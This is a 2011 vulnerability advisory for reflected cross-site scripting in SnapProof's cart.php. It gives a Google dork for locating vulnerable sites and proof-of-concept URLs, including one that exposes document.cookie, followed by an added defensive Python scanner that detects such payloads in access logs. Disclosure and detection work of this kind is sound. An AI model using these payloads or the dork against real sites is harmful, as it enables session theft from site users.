SnapProof (cart.php) Cross Site Scripting

2011-03-01T00:00:00
ID SECURITYVULNS:DOC:25823
Type securityvulns
Reporter Securityvulns
Modified 2011-03-01T00:00:00

Description

Exploit Title: SnapProof (cart.php) Cross Site Scripting

Google Dork: inurl:"Created and powered by SnapProof"

Home: www.D99Y.com

Date: 1/3/2011

Author: Difficult 511

Software Link: http://www.snapproof.com/

File: cart.php

Exploit:

http://localhost/cart.php?retPageID= [ XSS ]

http://localhost/cart.php?retPageID=<script>alert(12345)</script>

http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script>

Greetz: NassRawI and all members D99Y.com

Enjoy :)
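
For defenders, an added example (not part of the original advisory and not SnapProof code): a scan of web access logs for requests to cart.php whose retPageID parameter decodes to markup. The log lines, addresses and function names are constructed for illustration and assume the combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2011:10:00:01 +0000] "GET /cart.php?retPageID=12 HTTP/1.1" 200 5120',
    '198.51.100.8 - - [01/Mar/2011:10:00:05 +0000] "GET /cart.php?retPageID=%3Cscript%3Ealert(12345)%3C/script%3E HTTP/1.1" 200 5177',
    '198.51.100.9 - - [01/Mar/2011:10:00:09 +0000] "GET /cart.php?retPageID=%253Cscript%253Ealert(document.cookie)%253C%252Fscript%253E HTTP/1.1" 200 5190',
    '198.51.100.9 - - [01/Mar/2011:10:00:12 +0000] "GET /gallery.php?id=%3Cb%3E HTTP/1.1" 200 800',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out into HTML or script context.
MARKUP = re.compile(r'[<>"\']|javascript:', re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_retpageid(line):
    """Return the decoded retPageID value if it carries markup, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/cart.php"):
        return None
    # parse_qsl already decodes once; fully_decode handles further layers.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "retPageID":
            value = fully_decode(value)
            if MARKUP.search(value):
                return value
    return None

def scan(lines):
    """Return (client address, decoded value) for every flagged request."""
    return [(line.split()[0], hit) for line in lines
            if (hit := suspicious_retpageid(line))]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} retPageID={value!r}")
```
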